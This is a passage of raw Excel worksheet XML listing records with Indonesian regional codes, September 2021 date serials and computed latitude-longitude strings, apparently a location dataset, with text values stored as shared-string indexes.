      </c>
      <c r="L3876" t="s">
        <v>12879</v>
      </c>
      <c r="M3876">
        <v>6472030005</v>
      </c>
      <c r="N3876">
        <v>6472030</v>
      </c>
      <c r="O3876">
        <v>6472</v>
      </c>
      <c r="P3876">
        <v>64</v>
      </c>
      <c r="Q3876" t="s">
        <v>12880</v>
      </c>
      <c r="R3876" t="s">
        <v>12881</v>
      </c>
      <c r="S3876" t="s">
        <v>7175</v>
      </c>
      <c r="T3876" t="s">
        <v>1308</v>
      </c>
      <c r="U3876" s="5">
        <v>117122604847</v>
      </c>
      <c r="V3876" s="5" t="s">
        <v>17944</v>
      </c>
      <c r="W3876" s="5">
        <v>-528695233</v>
      </c>
      <c r="X3876" t="s">
        <v>21675</v>
      </c>
      <c r="Y3876" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.528695233,117.122604847</v>
      </c>
    </row>
    <row r="3877" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3877">
        <v>297043</v>
      </c>
      <c r="B3877" s="1">
        <v>44451</v>
      </c>
      <c r="C3877" t="s">
        <v>12882</v>
      </c>
      <c r="D3877" t="s">
        <v>22</v>
      </c>
      <c r="E3877" t="s">
        <v>23</v>
      </c>
      <c r="F3877" t="s">
        <v>12883</v>
      </c>
      <c r="G3877" t="s">
        <v>12884</v>
      </c>
      <c r="H3877" t="s">
        <v>26</v>
      </c>
      <c r="I3877" t="s">
        <v>5687</v>
      </c>
      <c r="J3877" t="s">
        <v>7171</v>
      </c>
      <c r="L3877" t="s">
        <v>12885</v>
      </c>
      <c r="M3877">
        <v>6472060004</v>
      </c>
      <c r="N3877">
        <v>6472060</v>
      </c>
      <c r="O3877">
        <v>6472</v>
      </c>
      <c r="P3877">
        <v>64</v>
      </c>
      <c r="Q3877" t="s">
        <v>12886</v>
      </c>
      <c r="R3877" t="s">
        <v>7203</v>
      </c>
      <c r="S3877" t="s">
        <v>7175</v>
      </c>
      <c r="T3877" t="s">
        <v>1308</v>
      </c>
      <c r="U3877" s="5">
        <v>117196771759</v>
      </c>
      <c r="V3877" s="5" t="s">
        <v>17945</v>
      </c>
      <c r="W3877" s="5">
        <v>-426422287</v>
      </c>
      <c r="X3877" t="s">
        <v>21676</v>
      </c>
      <c r="Y3877" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.426422287,117.196771759</v>
      </c>
    </row>
    <row r="3878" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3878">
        <v>297044</v>
      </c>
      <c r="B3878" s="1">
        <v>44451</v>
      </c>
      <c r="C3878" t="s">
        <v>12887</v>
      </c>
      <c r="D3878" t="s">
        <v>22</v>
      </c>
      <c r="E3878" t="s">
        <v>23</v>
      </c>
      <c r="F3878" t="s">
        <v>12888</v>
      </c>
      <c r="G3878" t="s">
        <v>12889</v>
      </c>
      <c r="H3878" t="s">
        <v>26</v>
      </c>
      <c r="I3878" t="s">
        <v>555</v>
      </c>
      <c r="J3878" t="s">
        <v>7171</v>
      </c>
      <c r="M3878">
        <v>6472060005</v>
      </c>
      <c r="N3878">
        <v>6472060</v>
      </c>
      <c r="O3878">
        <v>6472</v>
      </c>
      <c r="P3878">
        <v>64</v>
      </c>
      <c r="Q3878" t="s">
        <v>8404</v>
      </c>
      <c r="R3878" t="s">
        <v>7203</v>
      </c>
      <c r="S3878" t="s">
        <v>7175</v>
      </c>
      <c r="T3878" t="s">
        <v>1308</v>
      </c>
      <c r="U3878" s="5">
        <v>117146833624</v>
      </c>
      <c r="V3878" s="5" t="s">
        <v>17946</v>
      </c>
      <c r="W3878" s="5">
        <v>-450991323</v>
      </c>
      <c r="X3878" t="s">
        <v>21677</v>
      </c>
      <c r="Y3878" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.450991323,117.146833624</v>
      </c>
    </row>
    <row r="3879" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3879">
        <v>297045</v>
      </c>
      <c r="B3879" s="1">
        <v>44451</v>
      </c>
      <c r="C3879" t="s">
        <v>12890</v>
      </c>
      <c r="D3879" t="s">
        <v>22</v>
      </c>
      <c r="E3879" t="s">
        <v>23</v>
      </c>
      <c r="F3879" s="3" t="s">
        <v>12891</v>
      </c>
      <c r="G3879" t="s">
        <v>12892</v>
      </c>
      <c r="H3879" t="s">
        <v>26</v>
      </c>
      <c r="I3879" t="s">
        <v>1310</v>
      </c>
      <c r="J3879" t="s">
        <v>7171</v>
      </c>
      <c r="L3879" t="s">
        <v>12893</v>
      </c>
      <c r="M3879">
        <v>6472031004</v>
      </c>
      <c r="N3879">
        <v>6472031</v>
      </c>
      <c r="O3879">
        <v>6472</v>
      </c>
      <c r="P3879">
        <v>64</v>
      </c>
      <c r="Q3879" t="s">
        <v>12837</v>
      </c>
      <c r="R3879" t="s">
        <v>12685</v>
      </c>
      <c r="S3879" t="s">
        <v>7175</v>
      </c>
      <c r="T3879" t="s">
        <v>1308</v>
      </c>
      <c r="U3879" s="5">
        <v>117118520226</v>
      </c>
      <c r="V3879" s="5" t="s">
        <v>17947</v>
      </c>
      <c r="W3879" s="5">
        <v>-553183874</v>
      </c>
      <c r="X3879" t="s">
        <v>21678</v>
      </c>
      <c r="Y3879" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.553183874,117.118520226</v>
      </c>
    </row>
    <row r="3880" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3880">
        <v>297046</v>
      </c>
      <c r="B3880" s="1">
        <v>44451</v>
      </c>
      <c r="C3880" t="s">
        <v>12894</v>
      </c>
      <c r="D3880" t="s">
        <v>22</v>
      </c>
      <c r="E3880" t="s">
        <v>23</v>
      </c>
      <c r="F3880" t="s">
        <v>12895</v>
      </c>
      <c r="G3880" t="s">
        <v>12896</v>
      </c>
      <c r="H3880" t="s">
        <v>7978</v>
      </c>
      <c r="I3880" t="s">
        <v>8368</v>
      </c>
      <c r="J3880" t="s">
        <v>7171</v>
      </c>
      <c r="L3880" t="s">
        <v>12897</v>
      </c>
      <c r="M3880">
        <v>6472040002</v>
      </c>
      <c r="N3880">
        <v>6472040</v>
      </c>
      <c r="O3880">
        <v>6472</v>
      </c>
      <c r="P3880">
        <v>64</v>
      </c>
      <c r="Q3880" t="s">
        <v>12898</v>
      </c>
      <c r="R3880" t="s">
        <v>12559</v>
      </c>
      <c r="S3880" t="s">
        <v>7175</v>
      </c>
      <c r="T3880" t="s">
        <v>1308</v>
      </c>
      <c r="U3880" s="5">
        <v>117095135195</v>
      </c>
      <c r="V3880" s="5" t="s">
        <v>17948</v>
      </c>
      <c r="W3880" s="5">
        <v>-508371935</v>
      </c>
      <c r="X3880" t="s">
        <v>21679</v>
      </c>
      <c r="Y3880" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.508371935,117.095135195</v>
      </c>
    </row>
    <row r="3881" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3881">
        <v>297047</v>
      </c>
      <c r="B3881" s="1">
        <v>44451</v>
      </c>
      <c r="C3881" t="s">
        <v>12899</v>
      </c>
      <c r="D3881" t="s">
        <v>22</v>
      </c>
      <c r="E3881" t="s">
        <v>23</v>
      </c>
      <c r="F3881" t="s">
        <v>12900</v>
      </c>
      <c r="G3881" t="s">
        <v>12901</v>
      </c>
      <c r="H3881" t="s">
        <v>26</v>
      </c>
      <c r="I3881" t="s">
        <v>72</v>
      </c>
      <c r="J3881" t="s">
        <v>7171</v>
      </c>
      <c r="L3881" t="s">
        <v>12902</v>
      </c>
      <c r="M3881">
        <v>6472060005</v>
      </c>
      <c r="N3881">
        <v>6472060</v>
      </c>
      <c r="O3881">
        <v>6472</v>
      </c>
      <c r="P3881">
        <v>64</v>
      </c>
      <c r="Q3881" t="s">
        <v>8404</v>
      </c>
      <c r="R3881" t="s">
        <v>7203</v>
      </c>
      <c r="S3881" t="s">
        <v>7175</v>
      </c>
      <c r="T3881" t="s">
        <v>1308</v>
      </c>
      <c r="U3881" s="5">
        <v>117153057882</v>
      </c>
      <c r="V3881" s="5" t="s">
        <v>17949</v>
      </c>
      <c r="W3881" s="5">
        <v>-450049039</v>
      </c>
      <c r="X3881" t="s">
        <v>21680</v>
      </c>
      <c r="Y3881" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.450049039,117.153057882</v>
      </c>
    </row>
    <row r="3882" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3882">
        <v>297048</v>
      </c>
      <c r="B3882" s="1">
        <v>44451</v>
      </c>
      <c r="C3882" t="s">
        <v>12903</v>
      </c>
      <c r="D3882" t="s">
        <v>22</v>
      </c>
      <c r="E3882" t="s">
        <v>23</v>
      </c>
      <c r="F3882" t="s">
        <v>12904</v>
      </c>
      <c r="G3882" t="s">
        <v>12905</v>
      </c>
      <c r="H3882" t="s">
        <v>26</v>
      </c>
      <c r="I3882" t="s">
        <v>1526</v>
      </c>
      <c r="J3882" t="s">
        <v>7171</v>
      </c>
      <c r="L3882" t="s">
        <v>12906</v>
      </c>
      <c r="M3882">
        <v>6472031004</v>
      </c>
      <c r="N3882">
        <v>6472031</v>
      </c>
      <c r="O3882">
        <v>6472</v>
      </c>
      <c r="P3882">
        <v>64</v>
      </c>
      <c r="Q3882" t="s">
        <v>12837</v>
      </c>
      <c r="R3882" t="s">
        <v>12685</v>
      </c>
      <c r="S3882" t="s">
        <v>7175</v>
      </c>
      <c r="T3882" t="s">
        <v>1308</v>
      </c>
      <c r="U3882" s="5">
        <v>117111167908</v>
      </c>
      <c r="V3882" s="5" t="s">
        <v>17950</v>
      </c>
      <c r="W3882" s="5">
        <v>-559950498</v>
      </c>
      <c r="X3882" t="s">
        <v>21681</v>
      </c>
      <c r="Y3882" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.559950498,117.111167908</v>
      </c>
    </row>
    <row r="3883" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3883">
        <v>297049</v>
      </c>
      <c r="B3883" s="1">
        <v>44451</v>
      </c>
      <c r="C3883" t="s">
        <v>12907</v>
      </c>
      <c r="D3883" t="s">
        <v>22</v>
      </c>
      <c r="E3883" t="s">
        <v>23</v>
      </c>
      <c r="F3883" t="s">
        <v>12908</v>
      </c>
      <c r="G3883" t="s">
        <v>12909</v>
      </c>
      <c r="H3883" t="s">
        <v>26</v>
      </c>
      <c r="I3883" t="s">
        <v>1689</v>
      </c>
      <c r="J3883" t="s">
        <v>7171</v>
      </c>
      <c r="L3883" t="s">
        <v>12910</v>
      </c>
      <c r="M3883">
        <v>6472031005</v>
      </c>
      <c r="N3883">
        <v>6472031</v>
      </c>
      <c r="O3883">
        <v>6472</v>
      </c>
      <c r="P3883">
        <v>64</v>
      </c>
      <c r="Q3883" t="s">
        <v>12718</v>
      </c>
      <c r="R3883" t="s">
        <v>12685</v>
      </c>
      <c r="S3883" t="s">
        <v>7175</v>
      </c>
      <c r="T3883" t="s">
        <v>1308</v>
      </c>
      <c r="U3883" s="5">
        <v>117128248214</v>
      </c>
      <c r="V3883" s="5" t="s">
        <v>17951</v>
      </c>
      <c r="W3883" s="5">
        <v>-539409299</v>
      </c>
      <c r="X3883" t="s">
        <v>21682</v>
      </c>
      <c r="Y3883" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.539409299,117.128248214</v>
      </c>
    </row>
    <row r="3884" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3884">
        <v>297050</v>
      </c>
      <c r="B3884" s="1">
        <v>44451</v>
      </c>
      <c r="C3884" t="s">
        <v>12911</v>
      </c>
      <c r="D3884" t="s">
        <v>22</v>
      </c>
      <c r="E3884" t="s">
        <v>23</v>
      </c>
      <c r="F3884" t="s">
        <v>12912</v>
      </c>
      <c r="G3884" t="s">
        <v>12913</v>
      </c>
      <c r="H3884" t="s">
        <v>26</v>
      </c>
      <c r="I3884" t="s">
        <v>945</v>
      </c>
      <c r="J3884" t="s">
        <v>7171</v>
      </c>
      <c r="L3884" t="s">
        <v>12914</v>
      </c>
      <c r="M3884">
        <v>6472031005</v>
      </c>
      <c r="N3884">
        <v>6472031</v>
      </c>
      <c r="O3884">
        <v>6472</v>
      </c>
      <c r="P3884">
        <v>64</v>
      </c>
      <c r="Q3884" t="s">
        <v>12718</v>
      </c>
      <c r="R3884" t="s">
        <v>12685</v>
      </c>
      <c r="S3884" t="s">
        <v>7175</v>
      </c>
      <c r="T3884" t="s">
        <v>1308</v>
      </c>
      <c r="U3884" s="5">
        <v>117131752967</v>
      </c>
      <c r="V3884" s="5" t="s">
        <v>17952</v>
      </c>
      <c r="W3884" s="5">
        <v>-536634228</v>
      </c>
      <c r="X3884" t="s">
        <v>21683</v>
      </c>
      <c r="Y3884" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.536634228,117.131752967</v>
      </c>
    </row>
    <row r="3885" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3885">
        <v>297051</v>
      </c>
      <c r="B3885" s="1">
        <v>44452</v>
      </c>
      <c r="C3885" t="s">
        <v>12915</v>
      </c>
      <c r="D3885" t="s">
        <v>22</v>
      </c>
      <c r="E3885" t="s">
        <v>23</v>
      </c>
      <c r="F3885" t="s">
        <v>12916</v>
      </c>
      <c r="G3885" t="s">
        <v>12917</v>
      </c>
      <c r="H3885" t="s">
        <v>26</v>
      </c>
      <c r="I3885" t="s">
        <v>1359</v>
      </c>
      <c r="J3885" t="s">
        <v>7171</v>
      </c>
      <c r="L3885" t="s">
        <v>12918</v>
      </c>
      <c r="M3885">
        <v>6472060011</v>
      </c>
      <c r="N3885">
        <v>6472060</v>
      </c>
      <c r="O3885">
        <v>6472</v>
      </c>
      <c r="P3885">
        <v>64</v>
      </c>
      <c r="Q3885" t="s">
        <v>7202</v>
      </c>
      <c r="R3885" t="s">
        <v>7203</v>
      </c>
      <c r="S3885" t="s">
        <v>7175</v>
      </c>
      <c r="T3885" t="s">
        <v>1308</v>
      </c>
      <c r="U3885" s="5">
        <v>117166960154</v>
      </c>
      <c r="V3885" s="5" t="s">
        <v>17953</v>
      </c>
      <c r="W3885" s="5">
        <v>-426454354</v>
      </c>
      <c r="X3885" t="s">
        <v>21684</v>
      </c>
      <c r="Y3885" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.426454354,117.166960154</v>
      </c>
    </row>
    <row r="3886" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3886">
        <v>297052</v>
      </c>
      <c r="B3886" s="1">
        <v>44452</v>
      </c>
      <c r="C3886" t="s">
        <v>12919</v>
      </c>
      <c r="D3886" t="s">
        <v>2648</v>
      </c>
      <c r="E3886" t="s">
        <v>23</v>
      </c>
      <c r="G3886" t="s">
        <v>12920</v>
      </c>
      <c r="H3886" t="s">
        <v>26</v>
      </c>
      <c r="J3886" t="s">
        <v>8150</v>
      </c>
      <c r="L3886" t="s">
        <v>12921</v>
      </c>
      <c r="M3886">
        <v>3175040002</v>
      </c>
      <c r="N3886">
        <v>3175040</v>
      </c>
      <c r="O3886">
        <v>3175</v>
      </c>
      <c r="P3886">
        <v>31</v>
      </c>
      <c r="Q3886" t="s">
        <v>2730</v>
      </c>
      <c r="R3886" t="s">
        <v>2063</v>
      </c>
      <c r="S3886" t="s">
        <v>547</v>
      </c>
      <c r="T3886" t="s">
        <v>33</v>
      </c>
      <c r="U3886" s="5">
        <v>106905464000</v>
      </c>
      <c r="V3886" s="5" t="s">
        <v>17954</v>
      </c>
      <c r="W3886" s="5">
        <v>-6134143000</v>
      </c>
      <c r="X3886" t="s">
        <v>21685</v>
      </c>
      <c r="Y3886" t="str">
        <f t="shared" si="60"/>
        <v>-6.134143000,106.905464000</v>
      </c>
    </row>
    <row r="3887" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3887">
        <v>297114</v>
      </c>
      <c r="B3887" s="1">
        <v>44452</v>
      </c>
      <c r="C3887" t="s">
        <v>12922</v>
      </c>
      <c r="D3887" t="s">
        <v>22</v>
      </c>
      <c r="E3887" t="s">
        <v>23</v>
      </c>
      <c r="F3887" t="s">
        <v>12923</v>
      </c>
      <c r="G3887" t="s">
        <v>12924</v>
      </c>
      <c r="H3887" t="s">
        <v>26</v>
      </c>
      <c r="I3887" t="s">
        <v>3211</v>
      </c>
      <c r="J3887" t="s">
        <v>1152</v>
      </c>
      <c r="L3887" t="s">
        <v>12925</v>
      </c>
      <c r="M3887">
        <v>3173070001</v>
      </c>
      <c r="N3887">
        <v>3173070</v>
      </c>
      <c r="O3887">
        <v>3173</v>
      </c>
      <c r="P3887">
        <v>31</v>
      </c>
      <c r="Q3887" t="s">
        <v>322</v>
      </c>
      <c r="R3887" t="s">
        <v>323</v>
      </c>
      <c r="S3887" t="s">
        <v>62</v>
      </c>
      <c r="T3887" t="s">
        <v>33</v>
      </c>
      <c r="U3887" s="5">
        <v>106834874153</v>
      </c>
      <c r="V3887" s="5" t="s">
        <v>17955</v>
      </c>
      <c r="W3887" s="5">
        <v>-6170774326</v>
      </c>
      <c r="X3887" t="s">
        <v>21686</v>
      </c>
      <c r="Y3887" t="str">
        <f t="shared" si="60"/>
        <v>-6.170774326,106.834874153</v>
      </c>
    </row>
    <row r="3888" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3888">
        <v>297115</v>
      </c>
      <c r="B3888" s="1">
        <v>44452</v>
      </c>
      <c r="C3888" t="s">
        <v>12926</v>
      </c>
      <c r="D3888" t="s">
        <v>22</v>
      </c>
      <c r="E3888" t="s">
        <v>23</v>
      </c>
      <c r="F3888" t="s">
        <v>12927</v>
      </c>
      <c r="G3888" t="s">
        <v>12928</v>
      </c>
      <c r="H3888" t="s">
        <v>26</v>
      </c>
      <c r="I3888" t="s">
        <v>753</v>
      </c>
      <c r="J3888" t="s">
        <v>7637</v>
      </c>
      <c r="L3888" t="s">
        <v>12929</v>
      </c>
      <c r="M3888">
        <v>6201050011</v>
      </c>
      <c r="N3888">
        <v>6201050</v>
      </c>
      <c r="O3888">
        <v>6201</v>
      </c>
      <c r="P3888">
        <v>62</v>
      </c>
      <c r="Q3888" t="s">
        <v>12930</v>
      </c>
      <c r="R3888" t="s">
        <v>7640</v>
      </c>
      <c r="S3888" t="s">
        <v>7641</v>
      </c>
      <c r="T3888" t="s">
        <v>7642</v>
      </c>
      <c r="U3888" s="5">
        <v>111635888815</v>
      </c>
      <c r="V3888" s="5" t="s">
        <v>17956</v>
      </c>
      <c r="W3888" s="5">
        <v>-2668203185</v>
      </c>
      <c r="X3888" t="s">
        <v>21687</v>
      </c>
      <c r="Y3888" t="str">
        <f t="shared" si="60"/>
        <v>-2.668203185,111.635888815</v>
      </c>
    </row>
    <row r="3889" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3889">
        <v>297116</v>
      </c>
      <c r="B3889" s="1">
        <v>44452</v>
      </c>
      <c r="C3889" t="s">
        <v>12931</v>
      </c>
      <c r="D3889" t="s">
        <v>22</v>
      </c>
      <c r="E3889" t="s">
        <v>23</v>
      </c>
      <c r="F3889" t="s">
        <v>12932</v>
      </c>
      <c r="G3889" t="s">
        <v>12933</v>
      </c>
      <c r="H3889" t="s">
        <v>26</v>
      </c>
      <c r="I3889" t="s">
        <v>517</v>
      </c>
      <c r="J3889" t="s">
        <v>7637</v>
      </c>
      <c r="L3889" t="s">
        <v>12934</v>
      </c>
      <c r="M3889">
        <v>6201050011</v>
      </c>
      <c r="N3889">
        <v>6201050</v>
      </c>
      <c r="O3889">
        <v>6201</v>
      </c>
      <c r="P3889">
        <v>62</v>
      </c>
      <c r="Q3889" t="s">
        <v>12930</v>
      </c>
      <c r="R3889" t="s">
        <v>7640</v>
      </c>
      <c r="S3889" t="s">
        <v>7641</v>
      </c>
      <c r="T3889" t="s">
        <v>7642</v>
      </c>
      <c r="U3889" s="5">
        <v>111636403799</v>
      </c>
      <c r="V3889" s="5" t="s">
        <v>17957</v>
      </c>
      <c r="W3889" s="5">
        <v>-2667586945</v>
      </c>
      <c r="X3889" t="s">
        <v>21688</v>
      </c>
      <c r="Y3889" t="str">
        <f t="shared" si="60"/>
        <v>-2.667586945,111.636403799</v>
      </c>
    </row>
    <row r="3890" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3890">
        <v>297117</v>
      </c>
      <c r="B3890" s="1">
        <v>44452</v>
      </c>
      <c r="C3890" t="s">
        <v>12935</v>
      </c>
      <c r="D3890" t="s">
        <v>22</v>
      </c>
      <c r="E3890" t="s">
        <v>23</v>
      </c>
      <c r="F3890" t="s">
        <v>12936</v>
      </c>
      <c r="H3890" t="s">
        <v>26</v>
      </c>
      <c r="I3890" t="s">
        <v>65</v>
      </c>
      <c r="J3890" t="s">
        <v>3135</v>
      </c>
      <c r="L3890" t="s">
        <v>12937</v>
      </c>
      <c r="M3890">
        <v>3602190021</v>
      </c>
      <c r="N3890">
        <v>3602190</v>
      </c>
      <c r="O3890">
        <v>3602</v>
      </c>
      <c r="P3890">
        <v>36</v>
      </c>
      <c r="Q3890" t="s">
        <v>12938</v>
      </c>
      <c r="R3890" t="s">
        <v>12939</v>
      </c>
      <c r="S3890" t="s">
        <v>12940</v>
      </c>
      <c r="T3890" t="s">
        <v>171</v>
      </c>
      <c r="U3890" s="5">
        <v>106298882961</v>
      </c>
      <c r="V3890" s="5" t="s">
        <v>17958</v>
      </c>
      <c r="W3890" s="5">
        <v>-6408192573</v>
      </c>
      <c r="X3890" t="s">
        <v>21689</v>
      </c>
      <c r="Y3890" t="str">
        <f t="shared" si="60"/>
        <v>-6.408192573,106.298882961</v>
      </c>
    </row>
    <row r="3891" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3891">
        <v>297118</v>
      </c>
      <c r="B3891" s="1">
        <v>44453</v>
      </c>
      <c r="C3891" t="s">
        <v>12941</v>
      </c>
      <c r="D3891" t="s">
        <v>2648</v>
      </c>
      <c r="E3891" t="s">
        <v>23</v>
      </c>
      <c r="G3891" t="s">
        <v>12942</v>
      </c>
      <c r="H3891" t="s">
        <v>26</v>
      </c>
      <c r="J3891" t="s">
        <v>12528</v>
      </c>
      <c r="L3891" t="s">
        <v>12943</v>
      </c>
      <c r="M3891">
        <v>3175040004</v>
      </c>
      <c r="N3891">
        <v>3175040</v>
      </c>
      <c r="O3891">
        <v>3175</v>
      </c>
      <c r="P3891">
        <v>31</v>
      </c>
      <c r="Q3891" t="s">
        <v>10310</v>
      </c>
      <c r="R3891" t="s">
        <v>2063</v>
      </c>
      <c r="S3891" t="s">
        <v>547</v>
      </c>
      <c r="T3891" t="s">
        <v>33</v>
      </c>
      <c r="U3891" s="5">
        <v>106915642000</v>
      </c>
      <c r="V3891" s="5" t="s">
        <v>17959</v>
      </c>
      <c r="W3891" s="5">
        <v>-6111404000</v>
      </c>
      <c r="X3891" t="s">
        <v>21690</v>
      </c>
      <c r="Y3891" t="str">
        <f t="shared" si="60"/>
        <v>-6.111404000,106.915642000</v>
      </c>
    </row>
    <row r="3892" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3892">
        <v>297177</v>
      </c>
      <c r="B3892" s="1">
        <v>44453</v>
      </c>
      <c r="C3892" t="s">
        <v>12944</v>
      </c>
      <c r="D3892" t="s">
        <v>22</v>
      </c>
      <c r="E3892" t="s">
        <v>23</v>
      </c>
      <c r="F3892" t="s">
        <v>12945</v>
      </c>
      <c r="G3892" t="s">
        <v>12946</v>
      </c>
      <c r="H3892" t="s">
        <v>26</v>
      </c>
      <c r="I3892" t="s">
        <v>5188</v>
      </c>
      <c r="J3892" t="s">
        <v>9316</v>
      </c>
      <c r="L3892" t="s">
        <v>12947</v>
      </c>
      <c r="M3892">
        <v>9408060019</v>
      </c>
      <c r="N3892">
        <v>9408060</v>
      </c>
      <c r="O3892">
        <v>9408</v>
      </c>
      <c r="P3892">
        <v>94</v>
      </c>
      <c r="Q3892" t="s">
        <v>12948</v>
      </c>
      <c r="R3892" t="s">
        <v>12949</v>
      </c>
      <c r="S3892" t="s">
        <v>12950</v>
      </c>
      <c r="T3892" t="s">
        <v>9321</v>
      </c>
      <c r="U3892" s="5">
        <v>136238263249</v>
      </c>
      <c r="V3892" s="5" t="s">
        <v>17960</v>
      </c>
      <c r="W3892" s="5">
        <v>-1865254100</v>
      </c>
      <c r="X3892" t="s">
        <v>21691</v>
      </c>
      <c r="Y3892" t="str">
        <f t="shared" si="60"/>
        <v>-1.865254100,136.238263249</v>
      </c>
    </row>
    <row r="3893" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3893">
        <v>297210</v>
      </c>
      <c r="B3893" s="1">
        <v>44453</v>
      </c>
      <c r="C3893" t="s">
        <v>12951</v>
      </c>
      <c r="D3893" t="s">
        <v>22</v>
      </c>
      <c r="E3893" t="s">
        <v>23</v>
      </c>
      <c r="F3893" t="s">
        <v>12952</v>
      </c>
      <c r="G3893" t="s">
        <v>12953</v>
      </c>
      <c r="H3893" t="s">
        <v>26</v>
      </c>
      <c r="I3893" t="s">
        <v>12954</v>
      </c>
      <c r="J3893" t="s">
        <v>9316</v>
      </c>
      <c r="L3893" t="s">
        <v>12955</v>
      </c>
      <c r="M3893">
        <v>9408060015</v>
      </c>
      <c r="N3893">
        <v>9408060</v>
      </c>
      <c r="O3893">
        <v>9408</v>
      </c>
      <c r="P3893">
        <v>94</v>
      </c>
      <c r="Q3893" t="s">
        <v>12956</v>
      </c>
      <c r="R3893" t="s">
        <v>12949</v>
      </c>
      <c r="S3893" t="s">
        <v>12950</v>
      </c>
      <c r="T3893" t="s">
        <v>9321</v>
      </c>
      <c r="U3893" s="5">
        <v>136236248016</v>
      </c>
      <c r="V3893" s="5" t="s">
        <v>17961</v>
      </c>
      <c r="W3893" s="5">
        <v>-1875880710</v>
      </c>
      <c r="X3893" t="s">
        <v>21692</v>
      </c>
      <c r="Y3893" t="str">
        <f t="shared" si="60"/>
        <v>-1.875880710,136.236248016</v>
      </c>
    </row>
    <row r="3894" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3894">
        <v>297211</v>
      </c>
      <c r="B3894" s="1">
        <v>44453</v>
      </c>
      <c r="C3894" t="s">
        <v>12957</v>
      </c>
      <c r="D3894" t="s">
        <v>22</v>
      </c>
      <c r="E3894" t="s">
        <v>23</v>
      </c>
      <c r="F3894" t="s">
        <v>12958</v>
      </c>
      <c r="G3894" t="s">
        <v>12959</v>
      </c>
      <c r="H3894" t="s">
        <v>26</v>
      </c>
      <c r="I3894" t="s">
        <v>805</v>
      </c>
      <c r="J3894" t="s">
        <v>9316</v>
      </c>
      <c r="L3894" t="s">
        <v>12960</v>
      </c>
      <c r="M3894">
        <v>9408060015</v>
      </c>
      <c r="N3894">
        <v>9408060</v>
      </c>
      <c r="O3894">
        <v>9408</v>
      </c>
      <c r="P3894">
        <v>94</v>
      </c>
      <c r="Q3894" t="s">
        <v>12956</v>
      </c>
      <c r="R3894" t="s">
        <v>12949</v>
      </c>
      <c r="S3894" t="s">
        <v>12950</v>
      </c>
      <c r="T3894" t="s">
        <v>9321</v>
      </c>
      <c r="U3894" s="5">
        <v>136236305242</v>
      </c>
      <c r="V3894" s="5" t="s">
        <v>17962</v>
      </c>
      <c r="W3894" s="5">
        <v>-1880155646</v>
      </c>
      <c r="X3894" t="s">
        <v>21693</v>
      </c>
      <c r="Y3894" t="str">
        <f t="shared" si="60"/>
        <v>-1.880155646,136.236305242</v>
      </c>
    </row>
    <row r="3895" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3895">
        <v>297215</v>
      </c>
      <c r="B3895" s="1">
        <v>44453</v>
      </c>
      <c r="C3895" t="s">
        <v>12961</v>
      </c>
      <c r="D3895" t="s">
        <v>22</v>
      </c>
      <c r="E3895" t="s">
        <v>23</v>
      </c>
      <c r="F3895" t="s">
        <v>12962</v>
      </c>
      <c r="G3895" t="s">
        <v>12963</v>
      </c>
      <c r="H3895" t="s">
        <v>26</v>
      </c>
      <c r="I3895" t="s">
        <v>1194</v>
      </c>
      <c r="J3895" t="s">
        <v>3135</v>
      </c>
      <c r="L3895" t="s">
        <v>12964</v>
      </c>
      <c r="M3895">
        <v>3674070007</v>
      </c>
      <c r="N3895">
        <v>3674070</v>
      </c>
      <c r="O3895">
        <v>3674</v>
      </c>
      <c r="P3895">
        <v>36</v>
      </c>
      <c r="Q3895" t="s">
        <v>706</v>
      </c>
      <c r="R3895" t="s">
        <v>707</v>
      </c>
      <c r="S3895" t="s">
        <v>170</v>
      </c>
      <c r="T3895" t="s">
        <v>171</v>
      </c>
      <c r="U3895" s="5">
        <v>106677988700</v>
      </c>
      <c r="V3895" s="5" t="s">
        <v>17963</v>
      </c>
      <c r="W3895" s="5">
        <v>-6237719300</v>
      </c>
      <c r="X3895" t="s">
        <v>21694</v>
      </c>
      <c r="Y3895" t="str">
        <f t="shared" si="60"/>
        <v>-6.237719300,106.677988700</v>
      </c>
    </row>
    <row r="3896" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3896">
        <v>297220</v>
      </c>
      <c r="B3896" s="1">
        <v>44453</v>
      </c>
      <c r="C3896" t="s">
        <v>12965</v>
      </c>
      <c r="D3896" t="s">
        <v>22</v>
      </c>
      <c r="E3896" t="s">
        <v>23</v>
      </c>
      <c r="F3896" t="s">
        <v>12966</v>
      </c>
      <c r="G3896" t="s">
        <v>12967</v>
      </c>
      <c r="H3896" t="s">
        <v>26</v>
      </c>
      <c r="I3896" t="s">
        <v>1136</v>
      </c>
      <c r="J3896" t="s">
        <v>3135</v>
      </c>
      <c r="L3896" t="s">
        <v>12968</v>
      </c>
      <c r="M3896">
        <v>3602180010</v>
      </c>
      <c r="N3896">
        <v>3602180</v>
      </c>
      <c r="O3896">
        <v>3602</v>
      </c>
      <c r="P3896">
        <v>36</v>
      </c>
      <c r="Q3896" t="s">
        <v>12969</v>
      </c>
